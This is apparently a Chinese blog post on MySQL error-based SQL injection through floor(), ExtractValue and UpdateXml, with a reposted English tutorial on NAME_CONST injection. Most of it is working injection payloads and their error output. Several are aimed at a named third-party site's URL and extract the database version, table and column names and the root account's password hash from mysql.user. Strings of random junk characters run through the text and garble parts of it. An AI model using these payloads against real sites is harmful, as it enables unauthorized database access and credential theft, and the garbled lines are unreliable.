mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

admin

1、通过floor报错

可以通过如下一些利用代码

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

举例如下：
首先进行正常查询：

mysql> select * from article where id = 1;
3 }) {8 e3 x, Z7 u, f& E! S$ D+—-+——-+———+
| id | title | content |
$ E4 A8 s2 T& X( g1 F! Y+—-+——-+———+
' o$ o& P9 Q9 A; k$ K* N|  1 | test  | do it   |
+—-+——-+———+

假如id输入存在注入的话，可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);
3 E2 s8 e( n% S! \ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’

可以看到成功爆出了Mysql的版本，如果需要查询其他数据，可以通过修改version()所在位置语句进行查询。
% d. V0 S: n- S+ j$ S例如我们需要查询管理员用户名和密码：

Method1:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
; V/ D5 ~: v2 R) f. m* [ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

Method2:

mysql> select * from article where id = 1 and (select count(*)  from (select 1 union   select null union   select !1)x group by  concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

2、ExtractValue
0 @8 _2 k5 F' m% s8 j' X测试语句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′

3、UpdateXml

测试语句

and 1=(updatexml(1,concat(0x3a,(select user())),1))

实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’

再收集：

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
/ g& p+ i1 a- T- ~
' X4 o/ `! r" ^/ PErroruplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
, y) F3 ^1 k5 r0 T' u* s
Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
3 f' ]: l: V& W4 N9 q
MYSQL高版本报错注入技巧-利用NAME_CONST注入
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.


9 [& t1 y% `8 t+ }. W; n相关信息

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
' F! l/ p6 B3 j) c) |0 u
- ]* C4 t* P9 R3 k- l0 N& n  ?Code:
+ ^  q; U2 L3 c5 P9 ]* s5 s4 h1 MNAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)
" h' T# I4 ?3 C3 Z' u/ Q
: `( y: x# v+ }$ e% B
4 S* Q% E8 E  k4 N
5 J0 G2 u( q, n# ?$ {* l# W|---------------|
8 B' t6 G& X  R0 }* T: W7 ^|     TEST      |
) }2 X* V- U0 x|               |
|---------------|
|       1       |
|               |
# s& F8 E* v) F5 @9 g|---------------|

. v% V, T1 {5 y+ d3 F) n7 l


http://dev.mysql.com/doc/refman/5.0/en/m...name-const
- k# q6 a* y- V9 u' Y6 sIntro to MySQL Variables

2 ~1 L2 Q+ ?- j# sOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
0 P# u) ]( Q+ R. t$ z
, X% g2 K! O6 h8 t4 |* X3 G6 p$ U/ }Code:
" |  ?. @: Q& ]) Ohttp://www.baido.hk/qcwh/content ... ;sid=19&cid=261


" l) g6 z) o4 @, P& @


Code:
; \% @4 k/ i' j7 `; R- I$ c6 Zand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

' n1 Z2 T; n! X, \; n& s  q8 I1 f
VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

* x+ U( G8 @  P$ u! ]" RCode:
2 I( |+ ?  `+ u: H+ g2 A% j9 Jhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

- x$ ^' z! n- C& y# r3 ^  H, v7 ?Erroruplicate column name '5.0.27-community-nt'

) A9 L! M. ?' V# W& M% S* Y6 b


4 N' C, v% e; A5 r7 Y
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...

Data Extraction

; Z8 o% R2 f. H. D' i% w$ F( ~8 q0 TCode:
+ b6 L& n- l) @- b3 x; G  r+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--


, Y, ~- C  \. r% m6 O2 rWe should get a duplicate column 1 error...
0 c: r4 `2 t' h
Code:
% Q0 g9 F- J3 N2 v& A. F, Phttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

# ]) @$ H' }% x; \7 m- H9 ~Erroruplicate column name '1
( f' s5 a! Y) X3 {! t( o
3 h1 e0 r& Q  P+ ]1 a) K5 n/ l8 o+ k

# o7 a0 v0 k1 z2 R5 M  O' B8 j7 V
" q9 S$ w0 l% d5 t' I

# A" q9 t! Y9 h! u) o6 K" _' [Now let's get the tables out this bitch..

/ o/ p5 Q0 s8 Q2 l* n# ^Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--


' l1 @* p+ P" Q8 X1 j1 iLet's see if it works here, if it does, we can go on and finish the job.
) K  y0 f8 T; n  b
+ i1 P5 n& L+ HCode:
: z; L* D, m$ I0 p; R1 Thttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
1 K9 y- k6 f: h5 x- d  N& i
3 c. L' U4 [0 q9 ]6 u
Erroruplicate column name 'com_admanage
4 v" l  r# s  F2 f5 e# A

4 M. m" A1 G1 h- ?+ {" V& O' C1 E
3 n5 ?. f: N: W5 O$ n5 K2 A

7 v- h5 ^0 F7 X2 j
3 Z5 R0 }& W" ]6 zNow I'm going to be lazy and use mysql.user as an example, just for the sake of time.
+ n6 \! s! Y' n( I  x7 }
Let's get the columns out of the user table..
9 e& y, I% e) i3 ?6 X, G; y) ~
: h  X: D# U# P; L$ o: c% N: UCode:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

3 v- N4 N7 v# K' k: q
4 b$ \' |/ \' P5 w2 pSo mine looks like this, and I get the duplicate column name 'Host'.
; k& J5 z: Z8 k4 e* Y
Code:
( O5 w7 i- T. e# E0 W. o; xhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Erroruplicate column name 'Host'
: V1 j0 n/ q, b: a+ ?& ^

% a' z6 i. E# Q3 ?) v

6 a3 Q! _2 @, ^

Woot, time to finish this bitch off.
2 p1 u" h) O9 e# b% x$ E- b0 Q, A' ]/ N
/ k. p  N0 Q" k# N' @$ FCode:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

9 g9 H9 U( L& c1 A. T6 Z9 f( t- X# B
2 v3 _- N6 d* X- |1 S$ U- u& R9 j9 |So mine looks like this...

Code:
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
$ i4 f9 {) L" ^( y: `
Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

0 K# v; {7 F2 S$ U5 T  c
& {+ r" |7 H, |- |& j3 l
4 L/ _' x1 t+ \: j$ g  E( s

: S" Q) u' K' m* Z! ?% F$ c
And there we have it, thanks for reading.